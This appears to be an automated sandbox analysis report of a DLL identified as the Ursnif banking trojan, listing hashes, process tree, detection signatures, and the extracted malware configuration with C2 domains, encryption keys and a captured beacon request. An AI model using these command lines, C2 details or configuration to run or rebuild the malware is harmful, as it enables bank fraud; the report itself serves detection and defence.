Loading ...

Play interactive tourEdit tour

Windows Analysis Report 945.dll

Overview

General Information

Sample Name:945.dll
Analysis ID:448650
MD5:9453981ab8e71981bea907b3f2d11395
SHA1:ca0f69ef71bf287bdd19a8a9811c1f0dd2ff50e6
SHA256:fa97cd35d76337ff4a523ebdd7f879359a70432a14b7377f06df29c4679b3f70
Tags:dllgozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5904 cmdline: loaddll32.exe 'C:\Users\user\Desktop\945.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5780 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\945.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5516 cmdline: rundll32.exe 'C:\Users\user\Desktop\945.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5784 cmdline: rundll32.exe C:\Users\user\Desktop\945.dll,Clockcondition MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1048 cmdline: rundll32.exe C:\Users\user\Desktop\945.dll,Dogwhen MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1112 cmdline: rundll32.exe C:\Users\user\Desktop\945.dll,Sing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1636 cmdline: rundll32.exe C:\Users\user\Desktop\945.dll,Wholegray MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6084 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5208 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3672 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "ovNAU+HRorLZmwnDvbYFDY7UA+FTIAnF2uJSQd0M+N3ep6CVEhoDrEXACstP09QHK7cBl9nMAaFI1as0K4aXOQKngdScIQbDa3MQ98Ce9MYRMvxGUI05fSIRRFzMYffOXQr97vVUUUPjsYgfkDWS2eKPxSe5dz/pF0mjA0T8ibOLzHmVMs4vVv+nwVAw0xpD", "c2_domain": ["outlook.com", "auredosite.club", "vuredosite.club"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.392687998.0000000002ED8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.391393759.0000000004E68000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.391313671.0000000004E68000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000002.487967194.0000000002ED8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.391228461.0000000004E68000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 14 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000002.00000003.298516419.00000000007A0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "ovNAU+HRorLZmwnDvbYFDY7UA+FTIAnF2uJSQd0M+N3ep6CVEhoDrEXACstP09QHK7cBl9nMAaFI1as0K4aXOQKngdScIQbDa3MQ98Ce9MYRMvxGUI05fSIRRFzMYffOXQr97vVUUUPjsYgfkDWS2eKPxSe5dz/pF0mjA0T8ibOLzHmVMs4vVv+nwVAw0xpD", "c2_domain": ["outlook.com", "auredosite.club", "vuredosite.club"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 945.dllMetadefender: Detection: 22%Perma Link
            Source: 945.dllReversingLabs: Detection: 58%
            Source: 945.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: 945.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, 00000000.00000002.493176321.000000006E234000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.495266949.000000006E234000.00000002.00020000.sdmp, 945.dll

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49731 -> 40.97.116.82:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49749 -> 37.120.222.6:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49749 -> 37.120.222.6:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 37.120.222.6:80
            Source: Joe Sandbox ViewIP Address: 40.97.128.194 40.97.128.194
            Source: Joe Sandbox ViewIP Address: 52.97.232.194 52.97.232.194
            Source: global trafficHTTP traffic detected: GET /grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7zv/NA3IFZsX5L82cDak57at8n5/D4Cfgi7tVz/ry3I5zo4IJ_2BIobC/5nWwD7akwp5A/XzqLAJr21mH/cjfkiJFlq9y77G/1bzeLjs6zco1VtNrrz8EL/tJlbiHzqPNR1Mami/EAf48einPLf/Q.grow HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: outlook.com
            Source: ~DF64A2AAB8E5E3DF4B.TMP.19.dr, {7370D523-E4F5-11EB-90E4-ECF4BB862DED}.dat.19.drString found in binary or memory: https://outlook.office365.com/grower/XdjQoGbnNj_2FSimi4F/g1n0hL2Ovi8UAiji8IT8vO/AZ50N9cBD7ouh/W9Stcu
            Source: rundll32.exe, 00000003.00000003.390626600.0000000002D64000.00000004.00000001.sdmp, ~DFEA5774EEA628D538.TMP.19.dr, {7370D521-E4F5-11EB-90E4-ECF4BB862DED}.dat.19.drString found in binary or memory: https://outlook.office365.com/grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7
            Source: rundll32.exe, 00000003.00000002.490596255.0000000002CFA000.00000004.00000020.sdmpString found in binary or memory: https://www.redtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.392687998.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391393759.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391313671.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.487967194.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391228461.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391141192.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391066845.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392901039.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392858796.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392613103.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392808909.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392529075.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391440627.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392768559.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390980633.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392386685.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390863638.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.392687998.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391393759.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391313671.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.487967194.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391228461.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391141192.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391066845.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392901039.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392858796.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392613103.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392808909.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392529075.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391440627.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392768559.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390980633.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392386685.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390863638.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1996 GetProcAddress,NtCreateSection,memset,0_2_6E1F1996
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1A44 NtMapViewOfSection,0_2_6E1F1A44
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F23A5 NtQueryVirtualMemory,0_2_6E1F23A5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F21840_2_6E1F2184
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2117B00_2_6E2117B0
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E224E000_2_6E224E00
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E22BE610_2_6E22BE61
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E220DB80_2_6E220DB8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2205E50_2_6E2205E5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2288B70_2_6E2288B7
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2309C80_2_6E2309C8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2117B03_2_6E2117B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E224E003_2_6E224E00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E22BE613_2_6E22BE61
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E220DB83_2_6E220DB8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2205E53_2_6E2205E5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2288B73_2_6E2288B7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2309C83_2_6E2309C8
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E223290 appears 39 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E223290 appears 39 times
            Source: 945.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: classification engineClassification label: mal80.troj.winDLL@18/7@34/7
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF08C928D5E36F5DDB.TMPJump to behavior
            Source: 945.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,Clockcondition
            Source: 945.dllMetadefender: Detection: 22%
            Source: 945.dllReversingLabs: Detection: 58%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\945.dll'
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\945.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,Clockcondition
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\945.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,Dogwhen
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,Sing
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,Wholegray
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17414 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\945.dll',#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,ClockconditionJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,DogwhenJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,SingJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,WholegrayJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\945.dll',#1Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17414 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: 945.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 945.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 945.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 945.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 945.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 945.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 945.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: 945.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, 00000000.00000002.493176321.000000006E234000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.495266949.000000006E234000.00000002.00020000.sdmp, 945.dll
            Source: 945.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 945.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 945.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 945.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 945.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1BAC LoadLibraryA,GetProcAddress,0_2_6E1F1BAC
            Source: 945.dllStatic PE information: real checksum: 0x6292a should be: 0x68280
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F2120 push ecx; ret 0_2_6E1F2129
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F2173 push ecx; ret 0_2_6E1F2183
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E21DE07 push ecx; ret 0_2_6E21DE1A
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2232D5 push ecx; ret 0_2_6E2232E8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E20103D push cs; ret 0_2_6E20103E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E21DE07 push ecx; ret 3_2_6E21DE1A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E203276 push ebx; ret 3_2_6E20328A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E203244 pushad ; ret 3_2_6E203270
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2232D5 push ecx; ret 3_2_6E2232E8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E202AD8 push edx; retf 3_2_6E202AD9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20103D push cs; ret 3_2_6E20103E

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.392687998.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391393759.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391313671.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.487967194.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391228461.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391141192.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391066845.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392901039.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392858796.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392613103.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392808909.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392529075.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.391440627.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392768559.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390980633.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.392386685.0000000002ED8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390863638.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
